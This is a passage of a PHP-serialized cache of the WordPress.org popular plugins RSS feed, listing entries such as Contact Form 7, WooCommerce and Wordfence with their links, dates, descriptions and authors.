+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Contact Form 7\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/contact-form-7/#post-2141\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 02 Aug 2007 12:45:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2141@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Just another contact form plugin. Simple but flexible.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WP-PageNavi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wp-pagenavi/#post-363\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 23:17:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"363@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"Adds a more advanced paging navigation interface.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Lester Chan\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"NextGEN Gallery\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/nextgen-gallery/#post-1169\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Apr 2007 20:08:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"1169@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"The most popular WordPress gallery plugin and one of the most popular plugins of all time with over 14 million downloads.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Alex Rabe\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Really Simple CAPTCHA\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/really-simple-captcha/#post-9542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 09 Mar 2009 02:17:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"9542@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"Really Simple CAPTCHA is a CAPTCHA module intended to be called from other plugins. It is originally created for my Contact Form 7 plugin.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Takayuki Miyoshi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Regenerate Thumbnails\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wordpress.org/plugins/regenerate-thumbnails/#post-6743\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 23 Aug 2008 14:38:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"6743@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"Allows you to regenerate your thumbnails after changing the thumbnail sizes.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Alex Mills (Viper007Bond)\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Advanced Custom Fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/advanced-custom-fields/#post-25254\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 17 Mar 2011 04:07:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25254@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"Customise WordPress with powerful, professional and intuitive fields\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"elliotcondon\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2572@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html files.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Donncha O Caoimh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"All in One SEO Pack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"https://wordpress.org/plugins/all-in-one-seo-pack/#post-753\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Mar 2007 20:08:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"753@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"The most downloaded plugin for WordPress (almost 30 million downloads). Use All in One SEO Pack to automatically optimize your site for Search Engines\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"uberdose\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Duplicate Post\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/duplicate-post/#post-2646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Dec 2007 17:40:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2646@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Clone posts and pages.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Lopo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"TinyMCE Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/plugins/tinymce-advanced/#post-2082\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Jun 2007 15:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2082@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Enables the advanced features of TinyMCE, the WordPress WYSIWYG editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Andrew Ozz\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"W3 Total Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/w3-total-cache/#post-12073\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 29 Jul 2009 18:46:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"12073@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:132:\"Easy Web Performance Optimization (WPO) using caching: browser, page, object, database, minify and content delivery network support.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Frederick Townes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"WordPress Importer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/plugins/wordpress-importer/#post-18101\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 May 2010 17:42:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"18101@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Import posts, pages, comments, custom fields, categories, tags and more from a WordPress export file.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Brian Colinger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"The Wordfence WordPress security plugin provides free enterprise-class WordPress security, protecting your website from hacks and 